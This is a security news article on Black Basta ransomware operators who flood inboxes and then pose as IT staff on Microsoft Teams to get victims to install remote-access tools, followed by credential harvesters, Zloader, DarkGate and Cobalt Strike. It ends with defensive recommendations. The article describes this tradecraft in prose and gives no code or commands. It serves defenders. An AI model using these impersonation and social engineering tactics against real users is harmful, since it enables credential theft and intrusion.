Black Basta ransomware operators have improved their tactics, leveraging Microsoft Teams to deploy Zbot, DarkGate, and Custom Malware.
The ongoing social engineering campaign comprises a threat actor flooding a user’s inbox with junk and contacting the user to offer assistance.
Researchers observed that threat actors used Microsoft Teams as their primary medium for initial communication with the target.
Suppose the user responds to the lure by answering the call or sending a message. In that case, the threat actor will try to persuade them to install or run a remote management (RMM) program, such as QuickAssist, AnyDesk, TeamViewer, Level, or ScreenConnect, among others.
After establishing a remote connection, the threat actor proceeds to download payloads from their infrastructure to obtain the credentials of the affected users and continue to persistently target their assets.
“The overall goal following initial access appears to be the same: to quickly enumerate the environment and dump the user’s credentials. Operators will still attempt to steal any available VPN configuration files when possible, ” Rapid7 said in a report shared with Cyber Security News.
“With the user’s credentials, organization VPN information, and potential MFA bypass, it may be possible for them to authenticate directly to the target environment.”
Free Webinar on Best Practices for API vulnerability & Penetration Testing: Free Registration
Threat Actors’s Updated Tactics and Malware Payloads
Researchers noticed that operators were using the specific display names for Microsoft Teams. Whitespace characters may or may not be used to pad the display names.
Threat actors pose as IT employees of the targeted company by using their first and last names as the chat display name and/or account login.
Threat actors use the OpenSSH client, a native Windows program, to establish a reverse shell.
The threat actor provided the targeted user with a QR code in at least one case. Although the QR code’s intent is unknown, it seems to be an attempt to get around MFA after stealing a user’s login credentials.
Rapid7 has seen the use of the same credential harvesting executable, previously known as AntiSpam.exe, but it is now delivered in the form of a DLL and is normally executed by rundll32.
The use of the same credential harvesting executable has been observed, previously reported as AntiSpam.exe, but it is now delivered in the form of a DLL and is normally executed by rundll32.
Previously, the application was an unobfuscated.NET executable; however, it is now frequently placed within a compiled 64-bit DLL loader.
The most recent versions of the credential harvester now save output to the file 123.txt in the user’s %TEMP% directory, replacing the old qwertyuio.txt file.
However, earlier versions of the DLL distributed during the campaign would still output to the previous file.
Most frequently, a loader like Zbot (also known as Zloader) or DarkGate is executed after the credential harvester.
This can then assist data theft, function as a gateway for the execution of future payloads in memory, or carry out other malicious tasks.
The modular trojan Zloader, also known as Terdot, DELoader, or Silent Night, was created using the leaked Zeus source code.
The loader module of the latest version of Zloader encountered major modifications, including the addition of RSA encryption, an update to the domain generation process, and the first compilation for 64-bit Windows operating systems.
DarkGate is a multifunctional malware toolkit that has capabilities for keylogging, remote code execution, increasing privileges, avoiding detection, and stealing data from web browsers and Discord.
To remotely execute PowerShell instructions, operators were also disseminating alternative payload archives that contained Cobalt Strike beacon loaders and two Java payloads that contained a custom multi-threaded beacon and a user credential harvester variation.
In certain instances, operators have delivered a short command to the user using Teams, which, once executed by the intended user, will start an infection chain.
Recommendations
- Limit external users’ ability to communicate with users using Microsoft Teams as much as feasible.
- Standardize the environment’s remote management tools.
- Train users on how to recognize the social engineering campaign.
- Make VPN access standardized.
Analyse Real-World Malware & Phishing Attacks With ANY.RUN - Get up to 3 Free Licenses